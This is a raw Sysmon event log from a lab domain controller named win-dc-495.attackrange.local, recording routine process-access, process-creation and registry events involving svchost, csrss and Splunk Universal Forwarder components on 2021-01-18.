13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8FA5-6005-0001-00000000A301}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FA5-6005-0001-00000000A301}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.928{59A5CD1D-8FA5-6005-0001-00000000A301}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000004705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:40:06.646{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9f-0x6eada180) 10341000x80000000000000004718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FDC-6005-0101-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8FDC-6005-0101-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FDC-6005-0101-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.662{59A5CD1D-8FDC-6005-0101-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.505{59A5CD1D-8FDD-6005-0201-00000000A301}15643896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FDD-6005-0201-00000000A301}1564C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 